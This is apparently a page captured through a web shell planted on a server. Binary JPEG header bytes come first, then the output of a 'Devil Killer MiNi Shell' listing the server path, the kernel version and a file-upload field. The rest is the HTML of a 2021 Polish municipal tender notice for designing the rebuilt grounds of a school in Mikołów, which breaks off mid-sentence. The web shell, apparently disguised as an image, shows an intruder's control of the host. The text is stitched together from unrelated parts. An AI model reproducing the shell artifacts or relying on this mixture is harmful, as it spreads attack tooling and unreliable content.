JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210729/0013118101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00131181 z dnia 2021-07-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przebudowa i zmiana sposobu użytkowania zagospodarowania terenu Szkoły Podstawowej nr 1 przy ul. Konstytucji 3 Maja 20 w Mikołowie" - etap I - dokumentacja projektowa. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mikołów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276257630</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mikołów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-190</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam@mikolow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mikolow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Centrum Usług Wspólnych w Mikołowie - Gmina Mikołów</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">6351805347</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Karola Miarki 9</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Mikołów</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">43-190</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">322260169</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">zamowienia@cuw.mikolow.eu</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://cuw.mikolow.eu</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i zmiana sposobu użytkowania zagospodarowania terenu Szkoły Podstawowej nr 1 przy ul. Konstytucji 3 Maja 20 w Mikołowie" - etap I - dokumentacja projektowa. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-688b8d9a-f053-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00131181</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000488/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 „Przebudowa i zmiana sposobu użytkowania zagospodarowania terenu Szkoły Podstawowej nr 1 przy ul. Konstytucji 3 Maja 20 w Mikołowie"- etap I - dokumentacja projektowa</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/cuw_mikolow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający będzie komunikował<br/>się z wykonawcami za pośrednictwem platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/cuw_mikolow.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/cuw_mikolow. Zamawiający<br/>zaleca aby wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za<br/>pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do Zamawiającego”. Za datę<br/>przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich<br/>przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do<br/>Zamawiającego” po którym pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>Zamawiający dopuszcza komunikację za pośrednictwem poczty elektronicznej. Adres poczty<br/>elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: zamowienia@cuw.mikolow.eu.<br/>Zamawiający będzie przekazywał Wykonawcom informacje za pośrednictwem platformazakupowa.pl.<br/>Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia<br/>ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której<br/>zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana za<br/>pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy. Zamawiający, zgodnie z § 11 ust.<br/>2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r.<br/>(Dz. U. 2020 r. poz. 2452) w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące<br/>specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu<br/>przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.: a) stały dostęp do sieci<br/>Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b) komputer klasy PC lub MAC o<br/>następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, c)<br/>zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0, d) włączona obsługa JavaScript, e) zainstalowany program Adobe Acrobat Reader lub inny<br/>obsługujący format plików .pdf, f) Platformazakupowa.pl działa według standardu przyjętego w<br/>komunikacji sieciowej - kodowanie UTF8, g) Oznaczenie czasu odbioru danych przez platformę<br/>zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera<br/>synchronizowanego z zegarem Głównego Urzędu Miar. Ofertę, oświadczenie o niepodleganiu<br/>wykluczeniu oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składa się pod rygorem<br/>nieważności w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. W procesie składania oferty na platformie,<br/>kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca składa<br/>bezpośrednio na dokumencie (pliku), który następnie przesyła do systemu. Wykonawca składa ofertę<br/>wraz z załącznikami przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy<br/>zakupowej.<br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze<br/>szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji danych Zamawiający rekomenduje<br/>wykorzystanie jednego z rozszerzeń: .zip, .7Z. Wśród rozszerzeń powszechnych a niewystępujących w<br/>Rozporządzeniu KRI występują: .rar .gif .bmp. .numbers .pages. Dokumenty złożone w takich plikach<br/>zostaną uznane za złożone nieskutecznie. Maksymalny rozmiar jednego pliku przesyłanego za<br/>pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania oferty wynosi 150 MB,<br/>natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>Szczegółowy opis wymagań znajduje się w SWZ w Rozdziale IX i X.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: 1.Administratorem danych osobowych jest: Gmina<br/>Mikołów Urząd Miasta Mikołów, ul. Rynek 16, 43-190 Mikołów. 2. z Inspektorem Ochrony Danych,<br/>można kontaktować się - pisemnie na adres siedziby Zamawiającego, - poprzez pocztę elektroniczną<br/>pod adresem e-mail: grzegorz.szymanski@mikolow.eu, 3.Dane osobowe, o<br/>których mowa w pkt 1 przetwarzane są na podstawie art. 6 ust. 1 lit. c RODO w celu przeprowadzenia<br/>postępowania o udzielenie zamówienia publicznego i wykonania umowy w sprawie zamówienia<br/>publicznego. 4.Odbiorcami danych osobowych, o których mowa w pkt 1 będą: - osoby lub podmioty,<br/>którym udostępniona zostanie dokumentacja postępowania, - Centrum Usług Wspólnych w Mikołowie,<br/>- osoby upoważnione przez Administratora do przetwarzania danych osobowych, -podmioty będące<br/>dostawcami systemów teleinformatycznych wykorzystywanych przez Administratora. 5.Dane osobowe<br/>zawarte w dokumentacji postępowania nie będą stanowiły podstawy do podejmowania względem<br/>osób, których te dane dotyczą decyzji w sposób zautomatyzowany ani ich profilowania, stosowanie do<br/>art. 22 RODO. Pani/Pana dane osobowe przechowywane będą zgodnie z ustawą Pzp przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia. 6. Obowiązek podania danych<br/>osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania tych danych wynikają<br/>z ustawy Pzp. 7. Posiada Pan/Pani - na podstawie art. 15 RODO prawo dostępu do danych<br/>osobowych Pani/Pana dotyczących, - na podstawie art. 16 RODO prawo do sprostowania Pani/Pana<br/>danych osobowych, - na podstawie art. 18 RODO z zastrzeżeniem art. 19 ust.3 ustawy Pzp prawo<br/>żądania od administratora ograniczenia przetwarzania danych osobowych, - prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, że przetwarzanie<br/>danych osobowych narusza przepisy RODO. 8. Nie przysługuje Pani/Panu: -w związku z art. 17 ust. 3<br/>lit. b, d lub e RODO prawo do usunięcia danych osobowych, - prawo do przenoszenia danych<br/>osobowych, o których mowa w art. 20 RODO, - na podst. art.21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych gdyż podstawą prawną przetwarzania danych osobowych jest art. 6<br/>ust. 1 lit. c RODO. 9. Jednocześnie przypominam o ciążącym na Pani/Panu obowiązku informacyjnym<br/>wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną<br/>Zamawiającemu i których danych nie pozyskał bezpośrednio od tych osób lecz z innych źródeł, chyba<br/>że ma zastosowanie co najmniej jedno z wyłączeń tego obowiązku, o których mowa w art. 14 ust. 5<br/>RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP/5/2021/UM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: „Przebudowa i zmiana sposobu użytkowania<br/>zagospodarowania terenu Szkoły Podstawowej nr 1 przy ul. Konstytucji 3 Maja 20 w Mikołowie"<br/>- etap I - dokumentacja projektowa.<br/>2. Opis przedmiotu zamówienia:<br/>Dokumentacja winna zawierać w szczególności:<br/>- budowę boiska wielofunkcyjnego wraz z urządzeniami bezpieczeństwa (piłkochwyty),<br/>- wymianę i uzupełnienie ogrodzenia na ogrodzenie systemowe wraz z furtkami i bramami na<br/>obszarze szkoły,<br/>- odbudowę istniejących schodów, chodników i opasek,<br/>- roboty ziemne kształtowania skarpy,<br/>- budowę bieżni lekkoatletycznej wraz z torem do skoku w dal,<br/>- budowę drogi wewnętrznej jako utwardzenie terenu,<br/>- budowę i przebudowę systemu odwodnienia poprzez dreny, wymianę przykanalików rur<br/>spustowych<br/>i kanalizację deszczową,<br/>- izolację ścian fundamentowych i piwnicznych,<br/>- budowę oświetlenia,<br/>- budowę systemu monitoringu,<br/>- małą architekturę (ławki, kosze, poidełko itd.),<br/>- dostosowanie wejścia głównego dla osób niepełnosprawnych,<br/>- odtworzenie trawników i wykonanie nasadzeń krzewów,<br/>Zakres opracowania:<br/>- inwentaryzacja budowlana (architektoniczno - instalacyjna) – 3 egz.,<br/>- wizualizacja do akceptacji – 3 egz.,<br/>- niezbędne ekspertyzy, opinie techniczne - po 3 egz.,<br/>- projekty budowlano – wykonawcze branży architektoniczno-budowlanej i instalacyjnej oraz<br/>zagospodarowania terenu i małej architektury – w 4 egz.,<br/>- specyfikacja techniczna wykonania i odbioru robót - 4 egz.,<br/>- wykonanie kosztorysów inwestorskich - po 3 egz.,<br/>- przedmiary robót - wszystkie branże - 3 egz. oraz tabelę elementów scalonych,<br/>- uzyskanie niezbędnych uzgodnień i opinii innych organów, wymaganych przepisami<br/>szczególnymi zakończone uzyskaniem pozwolenia na budowę.<br/>3. Rodzaj zamówienia: usługi.<br/>4. Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 6 do SWZ – Wytyczne<br/>do projektowania.<br/>5. Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych<br/>we wzorze umowy stanowiącym załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71220000-6 - Usługi projektowania architektonicznego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71420000-8 - Architektoniczne usługi zagospodarowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający oceni i porówna jedynie oferty, które nie zostaną odrzucone.<br/>1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą:<br/>Łączna cena oferty brutto – 60,00 pkt. = 60%<br/>Doświadczenie osoby wyznaczonej do realizacji zamówienia, tj. osoby pełniącej funkcję głównego projektanta w specjalności architektonicznej – 40,00 pkt. = 40%<br/><br/>1.1 Przy ocenie kryterium „Cena” zostanie wykorzystany wzór: <br/>cena najniższa z ważnych ofert/ cena badanej oferty x 60<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Cena” wynosi 60.<br/><br/>1.2 Ocena kryterium „Doświadczenie głównego projektanta” <br/>Punkty zostaną przyznane w następujący sposób:<br/>Doświadczenie osoby wyznaczonej do realizacji zamówienia, tj. osoby pełniącej funkcję głównego projektanta w specjalności architektonicznej, gdzie głównym projektantem będzie osoba wykazana w formularzu oferty, tożsama z osobą wskazaną w wykazie osób jako główny projektant w specjalności architektonicznej:<br/>•	40 pkt - za wykonanie 4 i więcej projektów budowlanych zagospodarowania terenu, o wartości minimalnej prac projektowych 20.000,00 zł brutto;<br/>•	20 pkt - za wykonanie 2 do 3 projektów budowlanych zagospodarowania terenu, o wartości minimalnej prac projektowych 20.000,00 zł brutto;<br/>•	0 pkt - za wykonanie 1 projektu budowlanego zagospodarowania terenu, o wartości minimalnej prac projektowych 20.000,00 zł brutto;<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Doświadczenie głównego projektanta” wynosi 40.<br/>W przypadku niewskazania minimum 1 wykonanego projektu, bądź pozostawienie pola pustego, oferta Wykonawcy będzie odrzucona.<br/>2.	Oferty oceniane będą punktowo. Maksymalną ilość punktów, jaką może osiągnąć oferta wynosi 100.<br/>3.	W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty według następującej zasady:<br/>CN / CO x 60 + ilość pkt. związana z doświadczeniem głównego projektanta<br/>Wyjaśnienia: CN - cena oferty najtańszej<br/> CO - cena oferty badanej<br/>4.	Zamawiający zastosuje zaokrąglanie wyników do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie głównego projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale VII SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące<br/>zdolności technicznej lub zawodowej. Niniejszy warunek zostanie uznany za spełniony, jeżeli<br/>Wykonawca wykaże, że:<br/>a) dysponuje osobami skierowanymi do realizacji zamówienia, posiadającymi następujące<br/>kwalifikacje:<br/>- dysponuje min. 1 osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń<br/>w specjalności architektonicznej – główny projektant;<br/>- dysponuje min. 1 osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń<br/>w specjalności konstrukcyjno-budowlanej;<br/>- dysponuje min. 1 osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;<br/>- dysponuje min. 1 osobą posiadającą uprawnienia budowlane do projektowania bez ograniczeń<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych;<br/>b) posiada wiedzę i doświadczenie tj. wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie:<br/>- co 